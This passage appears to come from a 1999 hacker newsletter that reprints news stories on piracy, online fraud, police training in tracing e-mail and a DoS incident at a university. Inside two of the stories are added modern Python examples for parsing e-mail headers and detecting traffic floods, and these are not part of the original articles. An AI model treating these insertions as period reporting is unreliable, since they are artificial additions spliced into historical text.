His group also has a team of people who surf the Web and find offending sites. Most of the time, he said, they contact the site and get them to take the material down but he said the group brought a lawsuit once and settled for a $250 license fee. The license fee is based on the site’s revenue.

The National Music Publishers Association, which represents more than 17,000 music publishers, is issuing its own slew of cease-and-desist orders.
It is also interested in the lyrics and musical notations from copyrighted material. One of its most public efforts has been its battle against the Online Guitar Archive, OLGA, which has a library of some 33,000 guitar tablatures. The site has a search engine that allowed users to search the databases for a popular song and see how to play it using tabs, which teach guitarists how to play the song by showing them where to put their fingers. While printed music is put out by the music publishers, the tabs on OLGA are written by other guitar players.

OLGA, a site started in 1992, was an outgrowth of Usenet groups and has a loyal following around the world, getting some 50,000 hits a day when its archive was up. It shut down in early June and won’t reappear until it reaches an agreement with the Harry Fox Agency, said John Nielands, public relations director for the site. He said the site has received over 30,000 letters from users asking the agency to back down and he said over 35 volunteer attorneys have offered to prepare a legal brief arguing that the tabs meet the definition of fair use. Meanwhile, 15-20 mirror sites around the world have popped up in defiance of the order.

The OLGA shutdown follows a similar dispute between Warner Bros. and another tablature site, Guitartabs.com, that led the site to remove its tabs in May.

As for printed sheet music — a $600 million business worldwide — some companies are turning to digital watermarks that embed a code in their material that makes it easier to track down for infringement. Seattle-based Sunhawk Corp., a digital music publisher and online sheet music store that has signed contracts with Warner Bros., offers several thousand song titles with digital watermarks that tell the company who purchased the material. Downloadable audio samples are also encrypted so only one user can hear the music played without purchasing it.
“I think this is the future of how printed music is going to go,” said the company’s chief executive officer Brent Mills. His view is that the OLGA site is illegal but he said its popularity points out how huge the market is for online sheet music.

-=-

Software piracy a booming Net trade
‘You can go anywhere ... steal anything you want,’ official says
By Molly Masland
MSNBC

July 23 — Their names are often obscure — Zorgok’s Lair, the Legion of Krypt, XorcistX — and transient, changing without warning. They don’t do public relations, many don’t make money and their ‘proprietors’ are often still in their teens. The business of online software piracy has increased dramatically in recent years, vexing legitimate software makers.

“WHAT DO YOU want to pirate today?” reads a banner at one of the many sites that can be found by nearly any user doing a basic Internet search for the word ‘warez,’ the online term for unlicensed programs.

“The Internet lends itself to piracy,” said Peter Beruk, director of anti-piracy for the Software Publishers Association, a trade group based in Washington, D.C. “You can go anywhere you want, buy anything you want, and steal anything you want.”

The Internet, too, has fostered the demand for cheap software and the development of high-speed modems capable of quickly downloading large programs. Written in a variety of languages, including Russian, Vietnamese and German, some sites provide software for free or trade while others charge a fee.

INDUSTRY LOSSES

According to the software industry, piracy is not only a violation of copyright laws but a crime that costs manufacturers millions annually in lost revenue. A study published in June by the Business Software Alliance, which represents software vendors, and the Software Publishers Association, said the industry loses more than $11.4 billion a year worldwide to piracy. Although the group estimates that over 25 percent of software applications in the U.S. are pirated, the problem is far worse in developing areas of the world such as Southeast Asia and Eastern Europe, where piracy rates are said to hover as high as 95 percent or more of all applications in use.

“You’ll see just about every program that’s popular being offered and downloaded on the Internet,” said Bob Kruger, vice president of enforcement for the Business Software Alliance. “These people don’t appreciate the fact that what they’re doing inflicts injury on people. They think it’s a victimless crime, but it’s not.”

DEBATE OVER COSTS

While software piracy undoubtedly costs manufacturers revenue, some argue the figures are overblown. They claim the statistics are inaccurate because they discount the fact that many people who use pirated software would not have purchased a licensed copy in the first place.

“The numbers are very misleading,” said Jon Noring, founder of Omnimedia Digital Publishing, an online distributor of electronic books. “They’re right if you simply multiply the number of pirated copies by their selling cost. But the issue is really that in a piracy-free world, what percentage of those copies would actually have been bought?”

Two years ago, Noring himself was the target of a software pirate who cracked his security code for the Kama Sutra, one of the more popular books offered by Noring’s company, and made it available over the Internet for free. Omnimedia charges a fee to download the complete copy of a book. At first, Noring was concerned the breach would impact sales; two years later, he said he’s seen “absolutely no net effect whatsoever.”

Noring argues that some users, including many in developing countries, cannot afford to buy licensed software and would not have purchased it if they didn’t have access to a pirated copy. As one user from Singapore wrote in an online newsgroup, “Many Singaporeans support software piracy. Singaporeans know that it is morally wrong…so there’s no need to educate us.
It’s those software companies that need to be educated. If they lowered their software prices, Singaporeans would be willing to buy the originals. Anything more than $30 for the original is daylight robbery for us.”

For many users, especially teens and college students, collecting pirated software has become a compulsive hobby. While no software pirates contacted by MSNBC would comment on the subject, Noring says many do it for fun. “They get a rush and an excitement out of it,” he said. “Their disks are piled with the stuff but it’s not on their computers. They just have it. It’s like collecting the whole set or something.”

COPYRIGHT VIOLATION

Regardless of the debate over costs or the reasons why people use unlicensed programs, software piracy remains a crime under federal copyright laws. The U.S. Copyright Act gives the owner of a copyright the exclusive right to control the reproduction or distribution of a particular work. Anyone who distributes the work without permission of the owner violates the law and is subject to damage awards up to $100,000 per copyrighted work, or actual damages suffered by the owner if they can be proven.

“If somebody has one piece of software posted on a Web site, that may not warrant a civil suit or referral for criminal prosecution,” said Kruger. “But if you have somebody running a mail order business and advertising on the Internet, we want to have that site shut down and the operators prosecuted.”

In order to counter the efforts of online pirates, investigators try to identify a particular site’s Internet service provider and have the site disconnected. Often the sites provide their ISPs with false names and addresses, making it difficult, if not impossible, to track them down.

HARM TO USERS?

Although supporters of piracy may argue it’s harmless and actually does people a favor, others point out that piracy hurts not just manufacturers but also users who download it.
“There are a number of benefits you get when you purchase legal software,” said Kruger. “You get guarantees that it’s virus free and will operate as it’s supposed to. You also get technical support, a manual and access to upgrades. If you download it from the Internet, you get none of these things.”

In addition, pirates need a place to store their ‘warez’ and often surreptitiously hijack third-party servers to use as storage sites. This problem is especially acute at universities. According to Beruk, software pirates are most commonly high school or college students with access to servers where they can store large quantities of programs. Campus servers often become the unwitting hosts for bundles of illegal software.

One of the more dramatic cases Beruk has been involved in was at Andrews University, a small liberal arts college in Michigan. Campus tech support noticed that one of the university’s main servers was running at close to 90 percent capacity. After removing two ‘warez’ sites, the server’s capacity was back down to 20 percent.

“Those two sites by two college students were taking up 70 percent of the university’s server,” said Beruk. “That tells you how much software is being uploaded and downloaded on a regular basis. It tells you just how big the amount of traffic in illegal software really is.”

-=-

Age-old scams find new home on Net
Problem is ‘expanding exponentially,’ FTC attorney says
By Adam Snyder
SPECIAL TO MSNBC

July 23 — A certified public accountant and by his own estimation “no dummy,” Barry Wise first heard about the Fortuna Alliance — a promising investment opportunity being advertised on the Internet — from a colleague in April 1996. That same evening, he visited the Web site and read about “a unique mathematical formula” called “The Fibonacci Sequence,” whereby each member could earn up to $5,000 per month, in perpetuity, as soon as he or she had recruited 300 new investors.
REASSURED BY quotes on the site from dozens of satisfied customers and by a 90-day money-back guarantee, he mailed the Web site’s operators a check for just less than $5,000.

Unfortunately for Wise and other soon-to-be-dissatisfied customers, the Federal Trade Commission had not yet concluded its investigation of the Fortuna Alliance. The following month, the agency asked a federal court to shut down the site, which it said was advertising a classic pyramid, or “Ponzi,” scheme and to order its operators to pay restitution to investors.

Because of the agency’s action, Wise recovered about $3,000 — or close to 60 percent of his investment — though it took a year before he received his partial repayment from a claims administrator established by the FTC. On Wednesday, July 22, the FTC announced it had finished mailing more than $3 million in checks to people in 70 countries who were defrauded by Fortuna.

Since the crackdown on the Fortuna Alliance, the FTC has taken similar action against 36 Web sites engaged in all types of con games — everything from fraudulent land deals and work-at-home schemes to bogus charities and crooked contests. They all boil down to a single ruse, says Susan Grant, director of the National Fraud Information Center: convincing victims to part with their money without having to deliver anything of value in return.

“The fact that the Internet has made it possible for anyone to communicate with anyone else has lowered the barriers for being in business,” she said. “That’s obviously a good thing for small entrepreneurs. But it’s also provided a bonanza for scam artists.”

Most Internet frauds are “old-fashioned scams dressed up in high-tech garb,” FTC Chairman Robert Pitofsky testified during Senate hearings on Internet fraud in February. But the nature of the Internet makes these age-old scams easier to spring.
Before the Internet, peddlers of get-rich-quick schemes in search of suckers had to operate expensive mass-mailing campaigns or banks of telephones. Today, with a single keystroke, a scam artist can send e-mail to tens of thousands of online targets.

FOUR BASIC SCAMS

Experts charged with weeding out Internet fraud say almost all online scams fall into four categories:

Pyramid scheme: “Turn $5 into $60,000 in just four weeks” is most likely a come-on to an age-old “pyramid” or “Ponzi” scheme. Like the Fortuna Alliance scam, participants can only make money by recruiting new suckers, creating a “pyramid” that collapses like a chain letter as soon as no new “investors” can be found. Such pyramid schemes are illegal on or off the Internet.

Risk-free investment: There may be such a thing as a risk-free investment, but buying shares to help finance the construction of an ethanol plant in the Dominican Republic, which is what IVT Systems promised last year would generate a return of 50 percent or more, is not one of them. Nor are the countless other “risk-free” offerings on the Internet. After the SEC filed a complaint, IVT stopped advertising on the Internet.

Phone scams: Like many Internet scams, this is just a variation of one that has been around for years but which has found new life with the easy communications made possible by e-mail. You receive an e-mail urging you, by name, to call a telephone number in the “809” area code. Typically the incentive is that you’ve won a contest or sweepstakes. But “809” is actually the area code for the Caribbean, and the call will show up on your next phone bill at a rate of up to $20 per minute.
-=-

Scam combines e-mail, overseas call
FTC says its new Internet fraud unit is hot on con artists’ trail
By Mike Stuckey
MSNBC

May 18 — Internet con artists are pairing e-mail with overseas telephone numbers to fleece unwitting U.S. consumers, federal authorities said Tuesday in announcing a crackdown on the scam.

HERE’S HOW it works: Net users receive e-mail from a phony company advising them that “we have received your order.” The e-mail recipients have no memory of placing such an order, but the note includes an official-looking “confirmation number” and the startling news that anywhere from $300 to $900 will be billed to their credit cards. Any questions? A telephone number offers help.

The number actually goes to a phone-sex line in Dominica, an island nation in the Caribbean’s West Indies. Call it, and you’ll wind up with an unexpected charge on your next phone bill.

“That’s a good little scam,” said Ian Oxman of the Spam Recycling Center, a group that helps federal authorities and others track and fight junk e-mail.

In a first-of-its-kind action against so-far unknown perpetrators, the Federal Trade Commission’s newly formed Internet Fraud Rapid Response team has won a court order against the con artists. The action orders the perpetrators to stop the scam and prevents telephone carriers from remitting funds to the company behind the West Indies number, the FTC’s Eileen Harrington told MSNBC.

Harrington, the FTC’s director of marketing practices, said the FTC team — two attorneys and a researcher — is confident it will learn who is behind the e-mail and win a judgment against them.
“I don’t think it will take very long,” she said, adding that evidence gathered so far shows “the perpetrator is probably in the United States.”

The FTC began investigating the scam about three weeks ago as the result of some of the 10,000 consumer complaints it receives each month, said Harrington. America Online users were particularly hard hit, according to the FTC. Another big e-mail provider, Yahoo!, got no complaints, an employee said. Checks with telephone carriers showed that traffic to the West Indies number increased by “thousands and thousands” in March alone, Harrington said.

CHARGES VARY

Many who called the number saw it result in a $1.50 to $2 charge on their bills, Harrington said. Of course, if they stayed on the line longer, the charge was more, and she suspects a number of people called it twice, thinking they had misdialed the first time.

“It never ceases to amaze me how clever people can get when it comes to being underhanded,” said Oxman.

One bright spot for consumers, according to Harrington: While “it may be that the crooks are getting some benefit from technology … well, we’ve got some benefits, too.” With the rise of the Web and e-mail as information sources, the FTC is learning of scams “almost at the same time the consumer sees them.” As a result, “these are going to be rapidly brought cases. We want to do these cases in days and weeks,” she said.

-=-

The goods, the bids — and the ugly
Some buyers are getting hammered at online auction sites
By Adam Snyder
SPECIAL TO MSNBC

July 23 — Biologist William Porter made dozens of purchases in Internet auctions, mostly adding to his GI Joe collection, before deciding to upgrade his computer. His bid of $615 on a brand new Pentium 90 system was accepted, but the crooks never delivered the goods.

“I still buy things from Internet auction sites, but I won’t be making such an expensive purchase again, at least not if they demand payment in advance,” a rueful Porter said.
“IT’S ONE THING to risk $10 or $15. It’s another to get ripped off for $615,” he said.

Porter, a Maryland resident who sent his check to a California address, is a member of a growing fellowship of consumers who have discovered that the issue of trust is paramount when patronizing the garage sales of cyberspace.

Auction sites are a fast-growing commercial sector on the World Wide Web, offering people all over the world the chance to bid on merchandise that would otherwise be far beyond their geographic reach. The vast majority of the transactions go off without a hitch, but the hectic hives of e-commerce also present criminals with a perfect venue to do their bidding.

There are as many as 1,000 auction sites on the Web, matching sellers of everything from fine wines and rare coins to used cars and yesterday’s fishing gear with interested buyers. The highest bid wins the item, with the auction sites usually charging a small fee (often as low as 25 cents) and 5 percent of the sale fee.

CATERING TO NICHES

Many of them cater to specific niches, such as Winebid.com or Philatelists.com, but others are like galactic-scale general stores. EBay, which acted as middleman in Porter’s attempt to purchase a computer, is the industry leader. It sold more than $100 million worth of every kind of merchandise during the first quarter of 1998, and according to the ratings firm Media Metrix is now one of the five most visited shopping sites on the Web. Another leading online auction house, Onsale, has a registered customer base of more than 500,000 and has placed more than a million orders since its launch in May 1995.

Fraud is not a problem at auction houses like Firstauction, a subsidiary of the Home Shopping Network, and other Web retailers that own the merchandise that they sell directly to their customers. But sites that simply match buyer and seller offer a jilted would-be buyer little recourse.
Porter waited two weeks before inquiring by e-mail about the whereabouts of his computer. After a few exchanges, the seller stopped responding to his queries and the telephone number he had been given just rang and rang. In the end all he could do was post a warning on EBay to warn other buyers.

FTC URGES STANDARDS

Concerned about the problem of auction rip-offs, the Federal Trade Commission called a meeting in late May with executives from the top Internet auction sites — including EBay, Up4sale, Auction Universe, Haggle Online and Auction Addict — and urged them to adopt a voluntary code of conduct that would help prevent fraud. But the auction operators were noncommittal.

“The short answer is that they were interested in making money,” said an obviously frustrated Paul Luehr, one of the FTC attorneys who attended the meeting.

“I can’t say that I spend more than 15 minutes a week thinking about fraud,” acknowledged Meg Whitman, president of EBay.

But Whitman and other online auctioneers say they have already taken measures to combat fraud. For one thing, most have feedback systems that warn buyers of problem sellers. EBay, for example, assigns a plus 1 for a positive comment and a minus 1 for a negative comment. Anyone accumulating a score of minus 4 or lower is barred from the system.

In an effort to prevent thieves from preying on their clientele, most auction sites also require anyone with an anonymous e-mail — a Hotmail or Yahoo address, for example — to register with a credit card.

Such measures are by no means foolproof, however. Fraudulent sellers will often adopt multiple e-mail accounts that allow them to switch identities at will. And criminals who prowl the auction sites can use fraudulent credit cards to establish legitimate-appearing accounts.

ONLINE SHILLS A DANGER

Shills represent another danger to the unsuspecting bidder.
Most auction houses have rules against bidders in cahoots with the seller making bids for the sole purpose of driving up the price. But such tactics are virtually impossible to identify online, observers say.

“In a private sale, there’s not much someone who is cheated can do,” said Susan Grant, director of the National Fraud Information Center. “It’s not like responding to a local classified ad or buying something at a tag sale from the guy down the road, in which case you can drive to the seller’s house or take a trip to the local courthouse.”

Auction Universe, owned by Times Mirror Co., tries to mitigate this problem by partnering with local newspapers and attempting to match buyer and seller within the same geographic area. “We sell a lot of cars,” said President and CEO Larry Schwartz, “and almost all of them are sold to someone locally. We have no more than three or four complaints per month.”

The National Fraud Information Center, the FTC and online auction sites themselves offer recommendations on how to avoid becoming a victim of an unscrupulous seller. These include paying close attention to the site’s evaluation system, paying with a credit card whenever possible and using an escrow agent for large transactions. Some sites provide links to several such agents who, for a small fee, will hold the money until the goods are delivered.

FTC TAKES ACTION

But the FTC is not yet convinced that the voluntary guidelines currently in place are enough of a deterrent to fraud and is becoming more aggressive in going after auction house scam artists. In April, it took action against Craig Hare of Lake Worth, Fla., who, according to the FTC complaint, used online auction houses to offer new and used computers for sale. Then after the winning bidders paid as much as $1,450 per computer, Hare provided neither the merchandise nor a refund. Neither Hare nor his attorney could be reached for comment.
The FTC is investigating other auction scammers who systematically float from one auction house to another, defrauding consumers. The agency also says it could take action against the auction sites if the industry’s problems worsen. “The test would be if we determined that an auction site was engaged in ‘unfair and deceptive practices,’ ” said Lisa Hone, an FTC staff attorney.

@HWA

41.0 Cops Receive Info on Internet Crime Fighting
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

An all-day seminar on "Law Enforcement and the Internet" was recently held in New York and sponsored by Law Enforcement Internet Intelligence Report. The seminar covered topics ranging from tracking e-mail messages to how to spot malicious activity to the legal pitfalls in preparing subpoenas and search warrants.

APB Online
http://www.apbnews.com/cjprofessionals/behindthebadge/1999/10/26/seminar1026_01.html

Cops Get Lesson in Cyber-Sleuthing
Taught to Track E-mail, Crack Hackers, Win Subpoenas

Oct. 26, 1999
By David Noack

TARRYTOWN, N.Y. (APBnews.com) -- When fighting Internet crime, investigators should use all the same investigative methods they use in the brick-and-mortar world. After all, cyber-crooks leave behind clues and patterns just like traditional criminals, experts say.

With that said, Detective Eric Lundberg, a high-tech crime expert from the Massachusetts Attorney General's Office, turned his attention to the 150-person law enforcement audience gathered here recently. They were attending an all-day seminar on "Law Enforcement and the Internet" held by the Law Enforcement Internet Intelligence Report, a Boston-based newsletter covering the Internet and law enforcement.

The would-be cyber-sleuths were briefed on everything from the fine points of tracking e-mail messages to how to spot computer hackers to the legal pitfalls in preparing subpoenas and search warrants when going after computer criminals.
E-mails leave cyber-footprints

Lundberg detailed his tactics for identifying a cyber-criminal when there is nothing to go on but an anonymous and threatening e-mail message. While it seems complicated, Lundberg stressed that searching for the true identity of e-mail is a process of backtracking, since e-mails actually leave cyber-footprints.

E-mail is initially composed on a user's computer and then sent to a mail server computer, which is typically located at an Internet service provider such as America Online or CompuServe. Finding out where an e-mail originated is done by examining e-mail headers -- computerese for detailing the e-mail's travels in cyberspace.

E-mail headers not only include an e-mail address, but also an Internet protocol address, which is a series of numbers, Lundberg explained. Also included are the names of mail server computers, which relay e-mail messages. They can all help pinpoint a suspect.

Difficulty level increasing

As more people take advantage of free Web-based e-mail services that allow them to mask their identities in cyberspace, however, investigators say it's becoming more difficult to trace criminal activity and identify the culprits. Services such as Yahoo! Mail or Hotmail from the Microsoft Corp. are allowing computer users to create false e-mail identities, aliases and handles. Anyone who wishes can register an e-mail account to stalk and harass other users, obtain child pornography, hack into Web sites and gamble. Often, there's not much that can be done to prevent it.

Thor Lundberg, who is Eric's brother and a computer crimes investigator with the Raynham, Mass., Police Department, said that developing a profile of a computer hacker is difficult. "Hackers vary from being loners [and] misfits to being very arrogant and cocky," Thor Lundberg said.
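The header backtracking Lundberg describes, as an added Python example that is not from the article or the seminar: it reads the Received: lines of a constructed message (all hostnames and addresses are documentation-only placeholders, not real systems), lists the hops earliest-first, and separates the address the headers claim as the origin from the first hop an investigator can actually vouch for. Each mail server prepends its own Received: line, so the line written by the recipient's server is reliable, while everything below it arrived as sender-supplied data and can be forged; the deeper hops are leads to confirm with the next provider, which is where the subpoena step Delohery describes later comes in.

```python
import email
import re
from typing import Dict, List, Optional, Set

# A Received: line has the shape "from <helo> (<rdns> [<ip>]) by <mta> ...".
# The HELO name is whatever the connecting peer announced (sender-chosen);
# the parenthesised reverse-DNS name and address were recorded by the MTA
# that wrote the line. Layout varies between MTAs, so lines that do not
# match are kept raw rather than dropped.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s+\((?P<rdns>[^\s()\[\]]*)\s*\[(?P<ip>[^\]]+)\]\))?"
    r"\s+by\s+(?P<by>\S+)",
    re.IGNORECASE,
)

Hop = Dict[str, Optional[str]]


def parse_received_chain(raw_message: str) -> List[Hop]:
    """Return the Received: hops of a message, earliest hop first.

    MTAs prepend their Received: line, so the header block reads newest to
    oldest; the list is reversed so index 0 is the hop nearest the sender.
    """
    msg = email.message_from_string(raw_message)
    hops: List[Hop] = []
    for value in msg.get_all("Received") or []:
        value = " ".join(value.split())  # unfold continuation lines
        hop: Hop = {"raw": value, "helo": None, "rdns": None, "ip": None, "by": None}
        m = RECEIVED_RE.search(value)
        if m:
            hop.update(m.groupdict())
        hops.append(hop)
    hops.reverse()
    return hops


def claimed_origin_ip(hops: List[Hop]) -> Optional[str]:
    """Address in the earliest Received: line: a lead, not evidence.

    Every line below the one written by your own MTA was supplied by the
    sender and can be fabricated.
    """
    return hops[0]["ip"] if hops else None


def first_untrusted_peer(hops: List[Hop], trusted: Set[str]) -> Optional[str]:
    """Walk newest-first through lines written by MTAs in `trusted` and
    return the address of the first peer that is not one of ours. That peer
    (here the ISP's relay) is who to ask which subscriber held the next
    address at that timestamp.
    """
    peer = None
    for hop in reversed(hops):  # newest line first
        if hop["by"] not in trusted:
            break  # not written by us: nothing below is ours to trust
        peer = hop["ip"]
        if hop["ip"] in trusted or hop["rdns"] in trusted:
            continue  # internal relay, keep walking inward
        break
    return peer


# Constructed sample: two hops, documentation-only names and addresses.
SAMPLE_MESSAGE = """\
Received: from mail.isp.example (mail.isp.example [198.51.100.7])
        by mx.victim.example (Postfix) with ESMTP id ABC123
        for <target@victim.example>; Tue, 26 Oct 1999 10:15:02 -0400
Received: from dialup-42.pop3.isp.example (dialup-42.pop3.isp.example [203.0.113.42])
        by mail.isp.example (8.9.3/8.9.3) with SMTP id KAA04512;
        Tue, 26 Oct 1999 10:14:55 -0400
From: nobody@freemail.example
To: target@victim.example
Subject: you know what you did
Message-ID: <19991026141455.KAA04512@mail.isp.example>

Threatening text goes here.
"""

if __name__ == "__main__":
    chain = parse_received_chain(SAMPLE_MESSAGE)
    for n, hop in enumerate(chain):
        print(f"hop {n}: from {hop['helo']} [{hop['ip']}] by {hop['by']}")
    print("claimed origin:", claimed_origin_ip(chain))
    print("first peer we can vouch for:",
          first_untrusted_peer(chain, {"mx.victim.example"}))
```

With only `mx.victim.example` trusted, the code reports the ISP relay `198.51.100.7` as the last fact the recipient can vouch for and `203.0.113.42` as the claimed dial-up origin; once the ISP's own logs confirm its Received: line, the ISP's relay can be added to the trusted set and the walk reaches the dial-up address.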
Profiling online behavior

However, he said hackers do repeat certain online behaviors that can add up to an electronic profile of what they target and leave other cyber-clues to how they go about performing the hack.

Thor Lundberg explained that before hackers go after a particular Web site, they scout around for vulnerabilities, such as a weak firewall, an open port or another way to get into a server to cause damage. "Another hacker may not use that approach and look for holes, but try to find out how many neighbors, how many other servers are connected to that main computer server," he said.

Warned about reckless searches

Michael Delohery, an assistant Westchester County district attorney in the high-tech crime bureau, cautioned police officers to be careful when searching and seizing computer equipment and in the way they draft subpoenas and search warrants.

"You want to get ahold of subpoenas and search warrants so you can go obtain information. I'm here to warn you about going out and doing that recklessly," Delohery said.

He said that if they don't follow the right procedures, individual police officers and even prosecutors open themselves up to civil liability. He cited some pieces of federal legislation that affect how to go about gathering Internet-related crime evidence.

Law includes electronic publishing

The Privacy Protection Act is a result of the police in Palo Alto, Calif., getting a search warrant and seizing materials from a student newspaper that had covered a campus protest and subsequent clash with the police. The act prevents the seizing of two categories of evidence, defined as documentary materials and work-product materials. But the law includes a number of exceptions to what can be obtained during a search, and the law has been expanded to also include electronic publishing.

"If you do not follow the guidelines of the statute, you can be sued personally, and this has happened," Delohery said.
Federal law says what cops can do

The other federal law is the Electronic Communications Privacy Act, which covers three kinds of communications: wire, oral and electronic mail.

"This law lays down the guidelines for what you can do. It is not an easy subject to understand. But what you can take away from it is very simple. If you want subscriber information, who is behind that screen name, what's his address, what were his log-on times, what phone numbers was he logging into, that is information you can get through a grand jury subpoena. If you want to get anything further, such as e-mail and buddy list information, that is considered stored electronic communications," Delohery explained.

He said when seeking to find the real name behind a screen name, the first thing to do is to get a subpoena to the contact person at the Internet service provider.

"They should be able to give you a billing address, a billing name, credit card information and a telephone number, maybe two telephone numbers. Now you have a lot you can work with. The rest is not high-tech. This is basic police work, stuff that you guys know," Delohery said.

Jurisdiction problems on Internet

Delohery also said the lack of geographic boundaries in dealing with Internet crime creates jurisdictional problems.

"It's complicated because of the nature of the beast that you're dealing with," Delohery said. "This is not a simple little thing where you can say the murder took place in this town, in this particular house, at a very specific location. When you get connected to the Internet, you are now part of a worldwide community. The jurisdiction can bounce around from different areas," he said.

David Noack is an APBnews.com staff writer (david.noack@apbnews.com).

@HWA

42.0 LSU Experiences DOS Attack
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

A compromised student computer in Kirby-Smith Hall of Louisiana State University is being blamed for deprivation of service problems on some of LSU's systems. (If you want to laugh, read some of the quotes in this article attributed to LSUPD Capt. Mark Shaw. It is good to know he is on the case.)

Excite News
http://news.excite.com/news/uw/991027/university-291

LSU Web problems due to hacker
Updated 12:00 PM ET October 27, 1999

By Jenny Heil
The Reveille
Louisiana State U.

(U-WIRE) BATON ROUGE, La. -- The problems students may have experienced last week in gaining access to the Louisiana State University homepage were due to the work of a computer hacker.

Computing Services was experiencing deprivation of service problems, meaning legitimate users were getting busy signals when trying to log on the LSU website, said LSUPD Capt. Mark Shaw.

The problem was traced to a student's computer in Kirby-Smith Hall, but Computing Services determined the person causing the deprivation of services was not the owner of the computer. Rather, the person was from the outside and hacking into the student's computer without his permission, Shaw said.
The hacker illegally tapped into the LSU system, bombarding the site with traffic so that regular users could not log on, Shaw said.

"Computers are far from anonymous. They are not," Shaw said. "A system analyst can monitor any key stroke of any machine accessed to their machine."

In this case, Computing Services was monitoring its users to find the cause of the connection's crash. A massive amount of traffic was coming from one computer, so Computing Services called LSUPD and went to the source, Shaw said.

"We believe the hacking may be coming from out of the country," Shaw said. "That's the unique thing about the Internet. Once they're in, it can literally be anywhere in the world."

Computing Services does not intend to further investigate this incident, since the problem is solved for the time being, Shaw said. "All we're really interested in is restoring services," he said. "If we continue to see the problem in the future, we'll go into deeper measures."

Students should take precautions to protect not only the LSU mainframe, but their personal computers as well, Shaw said. "If you're not utilizing the mainframe or Internet access through the mainframe, shut down your Internet browser or log off the mainframe," Shaw said.

Signing off the Internet when a student is not using it can prevent hackers from causing problems such as the one Computing Services experienced Oct. 22. "It's a good, safe precaution for all users because once they're [hackers] in, they can do anything," Shaw said. "The old 'dog ate my homework' has been replaced by 'my computer crashed.'"

Students should also make sure their passwords include numbers and letters, which they should not share with anyone.

LSUPD has dealt with other computer fraud cases in the past, such as people accessing areas of the LSU site without authorization, people downloading or making illegal copies of software and people using the mainframe as storage space, Shaw said.
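The way Computing Services found the source, one host's traffic standing out against everyone else's, is the check a practitioner would want to automate. As an added Python example (not from the article, the Reveille or LSU), the code below parses web-server lines in Common Log Format, computes each client's peak request count over a sliding 60-second window and flags the outliers. The log lines are constructed inside the block with documentation-only addresses; `203.0.113.17` stands in for the Kirby-Smith Hall machine. The article's own caveat applies to the output: the flagged address is where the traffic came from, not necessarily who sent it, so the next step is to examine that host rather than blame its owner.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Tuple

# Common Log Format: host ident user [timestamp] "request" status size
CLF_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_clf(lines: List[str]) -> List[Tuple[datetime, str]]:
    """Return (timestamp, client address) pairs; lines that are not CLF are skipped."""
    events = []
    for line in lines:
        m = CLF_RE.match(line)
        if m:
            events.append((datetime.strptime(m.group("ts"), TS_FMT), m.group("src")))
    return events


def peak_rate(stamps: List[datetime], window: timedelta) -> int:
    """Largest number of requests from one client that fall inside any `window`."""
    stamps = sorted(stamps)
    peak = start = 0
    for end, ts in enumerate(stamps):
        while ts - stamps[start] > window:  # slide the window's left edge forward
            start += 1
        peak = max(peak, end - start + 1)
    return peak


def flood_sources(events: List[Tuple[datetime, str]],
                  window: timedelta = timedelta(seconds=60),
                  threshold: int = 50) -> Dict[str, int]:
    """Clients whose peak requests-per-window exceeds `threshold`, with that peak."""
    by_src: Dict[str, List[datetime]] = defaultdict(list)
    for ts, src in events:
        by_src[src].append(ts)
    flagged = {}
    for src, stamps in by_src.items():
        rate = peak_rate(stamps, window)
        if rate > threshold:
            flagged[src] = rate
    return flagged


def build_sample_log() -> List[str]:
    """Constructed access log: three ordinary clients plus one flooding host.

    Addresses are from the documentation-only ranges; nothing here is real traffic.
    """
    tz = timezone(timedelta(hours=-5))
    base = datetime(1999, 10, 22, 14, 0, 0, tzinfo=tz)
    lines = []
    for i in range(3):  # normal browsing: a page every 20 seconds
        for k in range(3):
            ts = base + timedelta(seconds=20 * k + i)
            lines.append(f'198.51.100.{10 + i} - - [{ts.strftime(TS_FMT)}] '
                         f'"GET /index.html HTTP/1.0" 200 5120')
    for k in range(120):  # flood: four hits a second for 30 seconds from one host
        ts = base + timedelta(milliseconds=250 * k)
        lines.append(f'203.0.113.17 - - [{ts.strftime(TS_FMT)}] '
                     f'"GET / HTTP/1.0" 200 5120')
    lines.append("this line is not in CLF and is ignored by the parser")
    return lines


if __name__ == "__main__":
    for src, rate in sorted(flood_sources(parse_clf(build_sample_log())).items()):
        print(f"{src}: peak {rate} requests in 60 s")
```

The threshold is deliberately a parameter: a busy proxy or a NAT gateway in front of a whole dorm legitimately exceeds what one browser produces, so the number has to be tuned against the site's normal traffic before it means anything.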
"A lot of what we see is someone coming into the LSU system to go out and access another site," he said.

If the current problem does come up again, Shaw said he thinks the cause may be the same, someone using a student's computer to gain access to LSU.

"If we just prevent the problem [with the above mentioned methods], it's as much for the students' protection as it is for the University," Shaw said.

(C) 1999 The Reveille via U-WIRE

@HWA

43.0 Oklahoma Paging System Vandalized
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

Details are sketchy but a vandal broke into a MetroCall paging system in Oklahoma and sent out a page that somehow triggered dozens of others. (Of course they don't use the word vandal; this guy had to be a 'hacker'.)

Excite News
http://news.excite.com/news/r/991028/06/ok-state-news-6

Pager Hoax Blamed On Computer Hacker
Updated 6:22 AM ET October 28, 1999

(STATEWIDE) -- Authorities now know the cause of a pesky pager problem in Oklahoma. MetroCall says a hacker broke into its paging system yesterday morning and sent out a page that snowballed into dozens more around the state. The pages went off for more than ten minutes. One of the two dozen numbers sent out in the pages belonged to the Cardiac Central Monitoring Unit at Presbyterian Hospital. It was flooded with calls all morning from pager owners, calling to find out who paged them. MetroCall says the situation has been remedied.

@HWA

44.0 You Thought You Were Safe
     ~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ender Wiggin

Brian Martin talks about the fact that nothing computerized is safe -- not your Dreamcast, your Palm Pilot, your word processing program or your telephone. He says "Security is all-inclusive, no longer a realm of obscure networks or sensitive databases full of nuclear codes and credit card numbers."

OSALL
